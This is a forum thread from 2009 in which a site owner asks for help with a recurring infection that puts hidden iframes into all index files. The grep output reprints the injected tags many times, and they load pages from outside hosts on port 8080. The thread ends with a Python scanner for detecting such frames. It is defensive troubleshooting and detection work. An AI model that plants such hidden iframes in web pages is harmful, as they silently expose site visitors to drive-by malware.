my forum is infected with unknown virus


ezak
07-26-2009, 01:57 PM
For a month I have faced a problem:
all my index* files contain this code

<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>

It infects ./forum/index.php, /index.html (redirect to forum/index.php), /admincp/index.php, modcp/index.php ... and any file with the name index will be infected


and it stops my forum.
I removed a lot of other scripts on that site, scanned for viruses, and installed ModSecurity with most rules

and it happened again, and I don't know why this problem occurs. Does anyone know anything about this virus?

Marco van Herwaarden
07-27-2009, 08:55 AM
What kind of server are you on? A shared server?

Most likely someone has access to your files and is editing them.

ezak
07-27-2009, 09:26 AM
I'm on a VPS and all my sites are mine,
and the other site does not have this problem,
only this one.
It happened suddenly and changed all index files with that code.
It has some sites like http://q1e.ru:8080 and other similar ones too; I don't know what it is.

It happens weekly or every 5 days.

Marco van Herwaarden
07-27-2009, 09:45 AM
Contact your host, most likely someone has access to your files.

ezak
07-28-2009, 07:30 AM
It's driving me crazy.
Some info from
grep -R iframe *
all my styles, and the forum index


vb/ubetube/misc/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/misc/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/ranks/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/ranks/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/thumbs/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/avatars/thumbs/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/avatars/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/attach/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/attach/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/gradients/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/gradients/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/smilies/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/smilies/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/buttons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/buttons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/icons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/icons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/polls/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/polls/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/statusicon/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/statusicon/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/regimage/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/backgrounds/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/regimage/backgrounds/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/fonts/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/regimage/fonts/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/editor/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/editor/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/reputation/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/reputation/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/rating/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/rating/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>

Every day now, all index files contain this code.
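
Added example, not part of the original post: a Python scan that narrows the `grep -R iframe *` check above to index* files carrying a hidden iframe that points at another host, listed oldest modification first. The function names and the `own_hosts` allow-list are assumptions made for this sketch; `SAMPLE` is the injected line quoted in the first post.

```python
import os
import re
import sys
import time
from urllib.parse import urlparse

# Injected line as quoted in the thread's first post.
SAMPLE = ('<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 '
          'style="visibility: hidden"></iframe>')

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Ways an injected frame is kept out of the visitor's sight.
HIDDEN_RE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none"
    r"""|\b(?:width|height)\s*=\s*["']?[01]\b""",
    re.IGNORECASE,
)

def find_hidden_iframes(html, own_hosts=()):
    """Return the hosts of hidden iframes in html that point off-site."""
    hosts = []
    for tag in IFRAME_RE.findall(html):
        src = SRC_RE.search(tag)
        if not src or not HIDDEN_RE.search(tag):
            continue  # visible frames and frames without src are ignored
        host = urlparse(src.group(1)).netloc.lower()
        if host and host not in own_hosts:  # relative URLs have no host
            hosts.append(host)
    return hosts

def scan_webroot(root, own_hosts=()):
    """Return [(path, mtime, hosts)] for index* files under root with hits."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().startswith("index"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hosts = find_hidden_iframes(fh.read(), own_hosts)
            if hosts:
                findings.append((path, os.path.getmtime(path), hosts))
    return sorted(findings, key=lambda f: f[1])  # oldest change first

if __name__ == "__main__":
    for path, mtime, hosts in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime))
        print(f"{stamp}  {path}  ->  {', '.join(sorted(set(hosts)))}")
```

The modification times give a window to compare against FTP, SSH and web server logs when looking for how the files were changed.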

flapjack
07-28-2009, 08:38 AM
Your webserver has a vulnerability of some sort.

Probably to do with an old version of cPanel or something like that.

Marco van Herwaarden
07-30-2009, 10:44 AM
See post #4.

ezak
07-30-2009, 11:35 AM
I already manage this host.
That is my own VPS, and I already have control of the node server,
and I don't know what to do.
I have already secured my server
with a hard CSF config, and installed Mod_Security with the most common rules.

I found this; it may be related to my issue:

http://blog.unmaskparasites.com/2009/04/29/another-type-of-iframe-hack-php-exploit/